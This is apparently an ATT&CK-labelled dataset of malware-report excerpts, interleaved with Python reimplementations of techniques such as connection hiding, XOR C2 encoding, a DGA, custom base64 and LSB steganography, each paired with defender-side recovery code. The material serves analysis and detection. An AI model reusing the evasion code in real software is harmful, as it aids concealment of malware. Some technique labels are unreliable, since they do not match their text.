{"text1":"The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http:\/\/<c2 domain>\/what","labels":"['T1053.005']"}
|
|
{"text1":"After executing the sample, we noticed the sample copied itself to a hidden folder and launched from the hidden folder. This is a good first step to hide itself from casual observation on disk","labels":"['T1564.001']"}
|
|
{"text1":"Qakbot has anti-analysis and anti-virtual machine checks. It will not continue to execute if any of the following exists in the system","labels":"['T1497.001']"}
|
|
{"text1":"Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. Hadoop\u2019s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL\/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message","labels":"['T1110.001']"}
|
|
{"text1":"BITSAdmin tool - Win32 apps BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. Using BITS - Win32 apps Using BITS - bitsadmin examples Examples showing how to use the bitsadmin tool to perform the most common tasks. Background Intelligent Transfer Service - Win32 apps Background Intelligent Transfer Service (BITS) transfers files (downloads or uploads) between a client and server and provides progress information related to the transfers. cleanmgr Configure the Disk Cleanup tool (Cleanmgr.exe) to automatically clean up certain files. bitsadmin Reference article for the bitsadmin command, which is a command-line tool used to create, download, or upload jobs and monitor their progress","labels":"['T1570']"}
|
|
{"text1":"Talos has identified two different infection vectors associated with this particular campaign. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. In the first scenario, Talos discovered a document named \"MinutesofMeeting-2May19.docx\", that appeared to display the national flag of Jordan. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine","labels":"['T1053.005']"}
|
|
{"text1":"After this it will destroy all shadow volumes of the victim machine and disable the protection of the recovery boot with this command","labels":"['T1490']"}
|
|
{"text1":"The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5: 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9","labels":"['T1059']"}
|
|
{"text1":"Steals Google Chrome and Apple Safari browser cookies from the victim\u2019s machine - Steals saved usernames and passwords in Chrome - Steals saved credit card credentials in Chrome - Steals iPhone\u2019s text messages if backed up to Mac - Steals cryptocurrency wallet data and keys - Keeps full control of the victim using the EmPyre backdoor - Mines cryptocurrency on the victim\u2019s machine","labels":"['T1555.003']"}
|
|
{"text1":"Look for traffic to any of the related malicious domains identified in Appendix A. Use the signatures provided by FireEye to identify related activity. Make sure all credentials in an organization, including service accounts, are reset following a breach and that default passwords or those similar to previous passwords are not used. If you run an on-premise Exchange environment, consider adding alerting mechanisms to any EDR solutions for processes using the Exchange Management Shell PowerShell cmdlets listed in Appendix B. This may or may not be a valid detection approach depending on how frequently this is used within your organization. More generally, if the Exchange Management Shell is rarely used in a legitimate Administrative context, it may be worth investigating any historical use of this shell","labels":"['T1482']"}
|
|
{"text1":"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. R88.sh\" is a shell script that installs a cron job and attempts to download \"lowerv2.sh\" or \"rootv2.sh. Based on the config file it uses, it appears to be the Monero Silent Miner. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure","labels":"['T1059.004']"}
|
|
{"text1":"It uses the\u00a0Windows service \u201cwinmgmts:\\\\.\\root\\SecurityCenter2 \u201d to check all AntiVirus products installed on the operating system. As shown below in the figure, it is done by creating an object for the service \u201c winmgmts:\\\\.\\root\\SecurityCenter2 \u201d and executing the query \u201c Select * From\u00a0AntiVirusProduct \u201d using that object","labels":"['T1518.001']"}
|
|
{"text1":"Flagpro v2.0 has another new function. If a dialog title is \u201cInternet Explorer [7-11]\u201d (the number after \u201cInternet Explorer\u201d depends on what version the user uses) when Flagpro accesses an external site, Flagpro sends a WM_CLOSE message to close the dialog","labels":"['T1070']"}
|
|
{"text1":"The file destruction algorithm is composed of two stages: a first stage to overwrite files and another to destroy the physical disk layout and the partition tables along with it. For the file destruction, it takes ownership of the files by modifying their ACL entries after it has obtained the 'SeTakeOwnershipPrivilege'. A file found will then simply be overwritten with zeros. This is done for the next 23 drives alphabetically (through \"Z:\\\"). On the second stage, the wiper attempts to set the drive layout of all the physical drives on the system numbered 9 to 0. This will wipe out all extended information about the physical drive's partitions including MBR, GPT and partition entries. Destroying the start of the files and the partition tables is a common technique seen on other wipers, and it is highly effective in preventing file recovery","labels":"['T1561.002']"}
|
|
{"text1":"BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed\u00a0Cobalt Strike payloads crafted to maintain persistence through reboot via\u00a0a\u00a0scheduled task\u00a0on critical systems in victim environments. In at least one case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication","labels":"['T1133']"}
|
|
{"text1":"This second request (Encoded Get System Information Request) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers, which uses a four-byte XOR encoding. Before acting on the request, Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking","labels":"['T1573.001', 'T1205']"}
|
|
{"text1":"an executable (also compressed, i.e. zip, rar or cab archive), sometimes pretending to be a different file format, like Dyreza - a document (commonly\u00a0PDF or\u00a0some MS Office format ) \u2013 like this Dridex downloader","labels":"['T1204.002']"}
|
|
{"text1":"After \u201cGetExtendedTcpTable\u201d is executed and the process returns to the second part of the code, it iteratively checks every record in the returned Tcp table. If any record contains the PID Waterbear wants to hide, it will remove the corresponding record, modify the record number inside the table, and continue to check the succeeding records","labels":"['T1562.006']"}
|
|
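The table edit in the Waterbear record above, simulated as an added example (not Waterbear's code). The struct layout is Windows' own MIB_TCPTABLE_OWNER_PID (a DWORD dwNumEntries followed by MIB_TCPROW_OWNER_PID rows of six DWORDs: state, local address, local port, remote address, remote port, owning PID). The rows, the hidden PID, and the assumption that the hook does not scrub the tail of the buffer after shifting rows up are mine.

```python
"""Simulation of the MIB_TCPTABLE_OWNER_PID edit described in the Waterbear record.

Added illustration, not Waterbear's code. Struct layout is Windows' real one;
rows, hidden PID and the un-scrubbed-tail assumption are constructed here.
"""
import struct

HDR = struct.Struct("<I")        # dwNumEntries
ROW = struct.Struct("<IIIIII")   # MIB_TCPROW_OWNER_PID


def build_table(rows) -> bytes:
    """Serialize rows the way GetExtendedTcpTable(TCP_TABLE_OWNER_PID_ALL) fills its buffer."""
    return HDR.pack(len(rows)) + b"".join(ROW.pack(*r) for r in rows)


def parse_table(buf: bytes) -> list:
    """Rows the header claims are present (what a tool reading the API result sees)."""
    (n,) = HDR.unpack_from(buf, 0)
    return [ROW.unpack_from(buf, HDR.size + i * ROW.size) for i in range(n)]


def hide_pid(buf: bytes, pid: int) -> bytes:
    """The post-call edit: drop rows owned by pid, shift the rest up, lower dwNumEntries.
    Done in place, so the buffer keeps its length and stale copies remain past the count."""
    keep = [r for r in parse_table(buf) if r[5] != pid]
    out = bytearray(buf)
    out[:HDR.size] = HDR.pack(len(keep))
    body = b"".join(ROW.pack(*r) for r in keep)
    out[HDR.size:HDR.size + len(body)] = body
    return bytes(out)


def owning_pids(buf: bytes) -> list:
    return sorted({r[5] for r in parse_table(buf)})


def stale_rows(buf: bytes) -> list:
    """Forensic read past dwNumEntries: if the hook did not zero the tail,
    the removed rows are still sitting there."""
    (n,) = HDR.unpack_from(buf, 0)
    total = (len(buf) - HDR.size) // ROW.size
    return [ROW.unpack_from(buf, HDR.size + i * ROW.size) for i in range(n, total)]


def count_mismatch(buf: bytes, reported_size: int) -> bool:
    """Consistency check: the size the API wrote to pdwSize should equal
    4 + 24 * dwNumEntries; after a row is hidden it is larger than that."""
    (n,) = HDR.unpack_from(buf, 0)
    return reported_size != HDR.size + n * ROW.size


# Constructed rows: (dwState, dwLocalAddr, dwLocalPort, dwRemoteAddr, dwRemotePort, dwOwningPid).
# Ports are kept in host order for readability; the real struct stores them big-endian in the low word.
SAMPLE_ROWS = [
    (2, 0x00000000, 135,   0x00000000, 0,   880),   # LISTEN, RPC endpoint mapper
    (5, 0x0A00000A, 49712, 0x5BCA6E11, 443, 4712),  # ESTABLISHED, the service process the backdoor injected into
    (2, 0x00000000, 445,   0x00000000, 0,   4),     # LISTEN, SMB (System)
    (5, 0x0A00000A, 49713, 0x5BCA6E12, 443, 4712),  # second connection from the same process
]

if __name__ == "__main__":
    table = build_table(SAMPLE_ROWS)
    hidden = hide_pid(table, 4712)
    print("visible PIDs before:", owning_pids(table), "after:", owning_pids(hidden))
    print("stale rows past the count:", stale_rows(hidden))
    print("size/count mismatch:", count_mismatch(hidden, len(table)))
```

Two things follow for a responder: a process that the netstat-style tooling on the box no longer shows can still appear in a raw dump of the buffer past dwNumEntries, and the reported size versus the claimed row count is a cheap sanity check worth keeping in any tool that consumes this API.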
{"text1":"The function will then download an encrypted file containing the final payload used in the campaign. The file is encrypted with a custom XOR-based algorithm, with the key 0x0AE2. In the latest versions, the authors moved from encryption to using a base64-encoded ZIP file","labels":"['T1027']"}
|
|
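Repeating-key XOR as it appears in the two records above (Winnti's four-byte XOR transport encoding gated on the magic 0xABC18CBA in the third DWORD, and the downloader's two-byte key 0x0AE2), as an added example that is not the samples' code. From the records: the key widths, the magic value and its position. Assumed: the actual key bytes, the header fields around the magic, the byte order of 0x0AE2, and the sample payload.

```python
"""Repeating-key XOR with a fixed-position magic, per the Winnti and downloader records.

Added illustration, not the samples' code. Key widths, magic value and its
position come from the records; key bytes, header layout, byte order of
0x0AE2 and the payload are assumptions.
"""
import struct

MAGIC = 0xABC18CBA
KEY_0AE2 = struct.pack("<H", 0x0AE2)  # assumed little-endian; the record gives only the value


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so one function both encodes and decodes."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_request(body: bytes, key: bytes, cmd: int = 1) -> bytes:
    """Assumed layout: DWORD total length, DWORD command id, DWORD magic, then body."""
    header = struct.pack("<III", 12 + len(body), cmd, MAGIC)
    return xor_crypt(header + body, key)


def parse_request(blob: bytes, key: bytes):
    """Decode and return (cmd, body) only if the third DWORD holds the magic, the gate
    the record describes before tasking is acted on; otherwise None."""
    plain = xor_crypt(blob, key)
    if len(plain) < 12:
        return None
    total, cmd, magic = struct.unpack_from("<III", plain, 0)
    if magic != MAGIC or total != len(plain):
        return None
    return cmd, plain[12:]


def recover_dword_key(blob: bytes) -> bytes:
    """Analyst side: a known plaintext at a fixed, key-aligned offset (the magic at
    bytes 8..11) gives back a four-byte repeating key from a single capture."""
    if len(blob) < 12:
        raise ValueError("need at least 12 bytes")
    return xor_crypt(blob[8:12], struct.pack("<I", MAGIC))


if __name__ == "__main__":
    key = bytes.fromhex("deadbeef")                    # assumed key
    req = build_request(b"GET_SYSTEM_INFO", key)
    print("wire bytes:", req.hex())
    print("recovered key:", recover_dword_key(req).hex())
    print("parsed:", parse_request(req, recover_dword_key(req)))
```

The magic that lets the implant reject stray traffic is also what makes the encoding trivial to strip from a capture: with a four-byte key and a four-byte constant at a key-aligned offset, one packet is enough.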
{"text1":"When the persistence operation finishes, the loader deletes itself by writing a batch file in the Windows temporary folder with the file name prefix \u2018tmp\u2019 followed by random digits. The batch file content","labels":"['T1070.004']"}
|
|
{"text1":"We also observed a third approach used by a malicious document file to deliver Hancitor. Although the threat actor and command and control servers are similar to the second Hancitor delivery approach, this one uses an alternate tactic to reach its goal of data theft","labels":"['T1027']"}
|
|
{"text1":"As we mentioned, the Bad Rabbit ransomware encrypts a victim\u2019s files and disk. Files are encrypted with the following algorithms","labels":"['T1486']"}
|
|
{"text1":"If opened, the dropper runs a loader known as Trojan.Vcrodat on the computer. Whitefly has consistently used a technique known as search order hijacking to run Vcrodat. If no path is provided, Windows searches for the DLL in specific locations on the computer in a pre-defined order. Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it. Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors. The group leverages search order hijacking to assure that its malicious DLLs will be executed. Targeting security applications could allow the attackers to gain higher privileges for the malware, since the vendor\u2019s component may be run with elevated privileges","labels":"['T1574.001']"}
|
|
{"text1":"This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In October 2016 Group-IB published the report about the Cobalt group. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and searches for critical servers and the computers from which they are accessed","labels":"['T1059.003']"}
|
|
{"text1":"2) The directory \u201cout\u201d is created in the user\u2019s %AppData% folder. 5) The screenshot is then copied over to the newly created \u201cout\u201d directory of the system where the batch script was executed. 6) In one instance, DHS observed an \u201cout.zip\u201d file created","labels":"['T1074.001']"}
|
|
{"text1":"Similar to many other ransomware operators, CARBON SPIDER not only encrypted victim files using Darkside, but also exfiltrated data for publication on a dedicated leak site (DLS) hosted on Tor. Further, CARBON SPIDER frequently conducted hypervisor jackpotting by encrypting ESXi servers using a version of Darkside specifically designed for ESXi","labels":"['T1486']"}
|
|
{"text1":"MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. Once installed, the malware checks for the existence of two files: keyword_parm.txt and parm.txt and attempts to read the configuration files every 30 seconds","labels":"['T1070.004']"}
|
|
{"text1":"OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents","labels":"['T1027.002']"}
|
|
{"text1":"The macro decodes the dropped files using Windows certutil.exe with the following commands (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows","labels":"['T1140']"}
|
|
{"text1":"Cobalt Strike. Use scheduled tasks and batch files for automation. The use of LOLBins. Erasing Windows Event Logs, files and tasks","labels":"['T1053.005']"}
|
|
{"text1":"In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server. The primary contents of the MSI package were","labels":"['T1218.007']"}
|
|
{"text1":"Then, it modifies the Team Viewer registry settings. As we said, the Team Viewer components used in this campaign are not the original ones. They are slightly modified. The malware author replaced all the entries of \u201cTeamviewer\u201d strings in Team Viewer components. TeamViewer client registry settings are then HKLMSoftwareGoldstagerVersion5 and HKLMSoftwareCoinstagerVersion5 correspondingly. The launcher sets up several registry values that control how the remote access tool will work. This parameter represents a hash of the password with which a remote user has to connect to Team Viewer client. After that, the starter executes the very Team Viewer client netsvcs.exe","labels":"['T1219']"}
|
|
{"text1":"Fake domains . Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. The attackers then used this fake website, which they hosted on a domain that was nearly identical to its legitimate counterpart, to distribute ObliqueRAT. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. Malicious file-sharing domains . Transparent Tribe also regularly registers domains that appear to be legitimate file- and media-sharing services. Lures and targeting . Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures . Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Conference attendees . Transparent Tribe also finds attendees of specific conferences to target. HoneyTraps . Transparent Tribe consistently uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. Transparent Tribe uses generically themed content-hosting domains as well as malicious domains masquerading as legitimate defense-related websites","labels":"['T1583.001']"}
|
|
{"text1":"AQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. OverWatch threat hunters also observed an attempt to discover and stop a third-party endpoint detection and response (EDR) service","labels":"['T1562.001', 'T1007', 'T1518.001']"}
|
|
{"text1":"The Konni malware family uses a custom base64 key to encode the content of several files in the exfiltration phase. We observed the same flow of data reconnaissance and exfiltration across all campaigns","labels":"['T1132.001']"}
|
|
{"text1":"Another interesting finding is that Bazar Loader has now implemented a Domain Generation Algorithm using the current date as a seed","labels":"['T1568.002']"}
|
|
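A date-seeded DGA and the defender-side precomputation a date seed makes possible, added here to illustrate the Bazar Loader record above. This is not Bazar's algorithm (the record says only that the current date is the seed), so the hash, label alphabet and length, domain count, salt, and the .example TLD are all assumptions.

```python
"""Illustrative date-seeded DGA plus the blocklist a defender derives from it.

Added example for the Bazar Loader record; NOT Bazar's algorithm. Hash, alphabet,
length, count, salt and TLD are assumptions; only 'seeded by the current date'
comes from the record.
"""
import hashlib
from datetime import date, timedelta

LETTERS = "abcdefghijklmnopqrstuvwxyz"


def dga(day: date, count: int = 10, length: int = 12, tld: str = ".example",
        salt: bytes = b"added-example-salt") -> list:
    """Deterministic domains for one calendar day: every bot computes the same list
    offline, so the operator only has to register one of them ahead of time."""
    seed = day.isoformat().encode() + salt
    out = []
    for i in range(count):
        digest = hashlib.sha256(seed + i.to_bytes(2, "big")).digest()
        out.append("".join(LETTERS[b % 26] for b in digest[:length]) + tld)
    return out


def blocklist_for_window(center: date, days_before: int = 1, days_after: int = 1, **kw) -> set:
    """What a defender with the algorithm does: generate yesterday, today and tomorrow
    (to absorb clock skew) and push the set to DNS logging or a sinkhole."""
    out = set()
    for k in range(-days_before, days_after + 1):
        out.update(dga(center + timedelta(days=k), **kw))
    return out


def is_generated(domain: str, today: date, **kw) -> bool:
    """Exact-match lookup against the current window."""
    return domain.lower().rstrip(".") in blocklist_for_window(today, **kw)


if __name__ == "__main__":
    today = date(2021, 3, 1)                      # constructed date
    for d in dga(today)[:3]:
        print("today:", d)
    print("tomorrow's first:", dga(today + timedelta(days=1))[0])
    print("blocklist size for the window:", len(blocklist_for_window(today)))
```

The operational point of a date seed is symmetrical: the bots need no live channel to agree on the day's names, and anyone who has reversed the algorithm can compute the same names before the operator registers them.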
{"text1":"Once the skimmer has the credit card details, it serializes the copied data into a string and encodes it with Base64. Then, it performs a character permutation on the encoded string to make sure it can\u2019t be directly decoded with Base64 decoding","labels":"['T1560.003']"}
|
|
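Custom-alphabet base64 and its recovery, as an added example serving three records above: the JavaScript backdoor decoded with a custom base64 alphabet, Konni's custom base64 key, and the skimmer that permutes characters after standard Base64 so that a plain decoder returns junk. None of this is those samples' code: the key-to-alphabet derivation, the key string and the sample record are assumptions; the mechanism (a 64-character substitution applied to standard base64 output) is what the records describe.

```python
"""Custom-alphabet base64: encode, decode, and recover the alphabet from known pairs.

Added illustration for the custom-base64 records; not the samples' code. The
keyed alphabet derivation and the sample data are constructed.
"""
import base64
import hashlib

STD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def make_alphabet(key: str) -> str:
    """Turn any key string into a permutation of STD (assumed scheme: sort by a keyed hash)."""
    return "".join(sorted(STD, key=lambda c: hashlib.sha256((key + c).encode()).digest()))


def encode(data: bytes, alphabet: str) -> str:
    """Standard base64, then a character substitution; '=' padding is left alone."""
    return base64.b64encode(data).decode("ascii").translate(str.maketrans(STD, alphabet))


def decode(text: str, alphabet: str) -> bytes:
    """Undo the substitution, then standard base64 decoding."""
    return base64.b64decode(text.translate(str.maketrans(alphabet, STD)))


def recover_mapping(plaintext: bytes, observed: str) -> dict:
    """Analyst side: one known plaintext/ciphertext pair yields the partial substitution
    table (standard char -> observed char); the union over enough pairs is the whole alphabet."""
    expected = base64.b64encode(plaintext).decode("ascii")
    if len(expected) != len(observed):
        raise ValueError("length mismatch; not a pure character substitution")
    mapping = {}
    for std_char, obs_char in zip(expected, observed):
        if std_char == "=":
            continue
        if mapping.setdefault(std_char, obs_char) != obs_char:
            raise ValueError("inconsistent mapping; not a pure character substitution")
    return mapping


def decode_with_mapping(observed: str, mapping: dict) -> bytes:
    """Decode using only recovered pairs; an unrecovered character fails loudly
    instead of producing silently wrong output."""
    inverse = {v: k for k, v in mapping.items()}
    try:
        std = "".join("=" if c == "=" else inverse[c] for c in observed)
    except KeyError as e:
        raise ValueError("alphabet position %r not yet recovered" % e.args[0])
    return base64.b64decode(std)


SAMPLE_RECORD = b"cc=4111111111111111;exp=12/27;cvv=123"  # constructed skimmer capture, test-card number

if __name__ == "__main__":
    alpha = make_alphabet("demo-key")                  # assumed key
    wire = encode(SAMPLE_RECORD, alpha)
    print("on the wire:      ", wire)
    print("plain b64decode:  ", decode(wire, STD))     # junk, as the skimmer intends
    print("with the alphabet:", decode(wire, alpha))
    print("pairs recovered:  ", len(recover_mapping(SAMPLE_RECORD, wire)), "of 64")
```

The substitution costs the attacker nothing and defeats casual `base64 -d`, but it is a monoalphabetic cipher over a known plaintext distribution: a handful of captured records whose content can be guessed (a known header, a test card number) recovers most of the table without touching the sample itself.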
{"text1":"The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named \u201creadme.png\u201d; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github","labels":"['T1564.001']"}
|
|
{"text1":"UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note","labels":"['T1204.001', 'T1598.003']"}
|
|
{"text1":"Xbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find NO functionality within Xbash that would enable restoration after the ransom is paid","labels":"['T1485']"}
|
|
{"text1":"The CoinTicker app also creates a user launch agent, named .espl.plist, that runs the same command periodically","labels":"['T1543.001']"}
|
|
{"text1":"This specific key is set to point towards the path of the previously copied Cardinal RAT executable path. The executable will periodically query this registry key to ensure it is set appropriately. If the executable finds the registry key has been deleted, it will re-set it. The Load registry key acts as a persistence mechanism, ensuring that this Cardinal RAT executes every time a user logs on. More information about the Load registry key may be found here","labels":"['T1547.001']"}
|
|
{"text1":"The 'ssonsvr.exe' file is a legitimate Citrix executable that will be used to sideload the malicious \u2018pnipcn.dll\u2019 file","labels":"['T1574.002']"}
|
|
{"text1":"1) Writes itself to %AppData%\\Microsoft\\Word\\log.ps1 2) Sets up persistence for this file, using a run key. 6) Removes all registry entries that are left behind during the dropper process","labels":"['T1070.004']"}
|
|
{"text1":"The process identifiers or PIDs to be hidden are stored in the shared memory \"Global\\<computer_name>.\" If the shared memory doesn't exist, it takes the PID embedded by the first-stage shellcode. In this case, the intention of the malicious code is to hide Waterbear\u2019s backdoor activities from the security product. Therefore, the first-stage shellcode takes the PID of the Windows Service \u2014 which the first-stage shellcode and the succeeding backdoor both inject into \u2014 hides the target process, and embeds that PID into the second-stage shellcode","labels":"['T1055.003']"}
|
|
{"text1":"Analysis of the F.bmp image revealed that it is indeed using Least Significant Bit (LSB) Steganography [9,10], a commonly used form of steganography that embeds data in an image without significantly affecting its appearance","labels":"['T1001.002']"}
|
|
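Least-significant-bit steganography as in the F.bmp record above, as an added example that is not the sample's code: each payload bit replaces the low bit of one cover byte, so no byte moves by more than one. The cover is a constructed pixel buffer standing in for BMP pixel data, and the 4-byte length prefix is my framing choice (the record does not describe one).

```python
"""LSB steganography: embed and extract bytes in the low bit of each cover byte.

Added illustration for the F.bmp record; not the sample's code. Cover buffer and
length-prefix framing are constructed/assumed.
"""
import random
import struct


def _bits(data: bytes):
    for b in data:
        for shift in range(7, -1, -1):
            yield (b >> shift) & 1


def _read_bytes(buf: bytes, byte_offset: int, count: int) -> bytes:
    """Reassemble `count` payload bytes from the low bits of buf, starting at payload byte `byte_offset`."""
    out = bytearray()
    for i in range(byte_offset, byte_offset + count):
        v = 0
        for k in range(8):
            v = (v << 1) | (buf[i * 8 + k] & 1)
        out.append(v)
    return bytes(out)


def embed(cover: bytes, payload: bytes) -> bytes:
    """Write len(payload) as a little-endian DWORD, then the payload, one bit per cover byte."""
    frame = struct.pack("<I", len(payload)) + payload
    if len(frame) * 8 > len(cover):
        raise ValueError("cover too small: need %d bytes, have %d" % (len(frame) * 8, len(cover)))
    out = bytearray(cover)
    for i, bit in enumerate(_bits(frame)):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def extract(stego: bytes) -> bytes:
    """Read the length prefix, sanity-check it against the cover, then the payload."""
    (n,) = struct.unpack("<I", _read_bytes(stego, 0, 4))
    if (4 + n) * 8 > len(stego):
        raise ValueError("length prefix exceeds cover; not this framing, or corrupted")
    return _read_bytes(stego, 4, n)


def max_pixel_delta(cover: bytes, stego: bytes) -> int:
    """Why the image looks unchanged: LSB embedding never moves a byte by more than 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))


def make_cover(n: int, seed: int = 7) -> bytes:
    """Constructed stand-in for raw pixel bytes."""
    rnd = random.Random(seed)
    return bytes(rnd.getrandbits(8) for _ in range(n))


if __name__ == "__main__":
    cover = make_cover(4096)
    payload = b"MZ\x90\x00 constructed second-stage blob"
    stego = embed(cover, payload)
    print("recovered:", extract(stego))
    print("largest per-byte change:", max_pixel_delta(cover, stego))
    print("capacity of this cover (bytes):", len(cover) // 8 - 4)
```

Against a real BMP the same code applies to the pixel array after the header (54 bytes for the common BITMAPINFOHEADER layout); capacity is one payload bit per pixel byte, which is why a modest image can carry a whole module.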
{"text1":"Smoke Loader not only installs its original sample but also replaces it with a fresh version, which is downloaded from the C&C \u2013 path: http:\/\/<CnC address>\/system32.exe. This trick makes detection more difficult \u2013 updated samples are repacked by a different crypter, may also have their set of C&Cs changed","labels":"['T1105']"}
|
|
{"text1":"The MainConnectionIo function checks if the Windows Firewall is enabled, sets the Tcp Keep Alive value and Non-blocking mode connection options and receives data from the remote host through the ReceiveCommandData function. If the communication fails, ZxShell disables the firewall by modifying the registry key","labels":"['T1562.004']"}
|
|
{"text1":"Payloads are now hosted on compromised websites. The payloads hosted on these websites consist of seemingly benign BMP image files. The malicious macros download the images and the ObliqueRAT payload is extracted to disk. The ObliqueRAT payload is renamed with the .pif file extension","labels":"['T1027.003']"}
|
|
{"text1":"Since version 0.4.1 Creates a new Primary Refresh Token (PRT) as JWT to be used to sign-in as the user","labels":"['T1606.002']"}
|
|
{"text1":"PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower","labels":"['T1041']"}
|
|
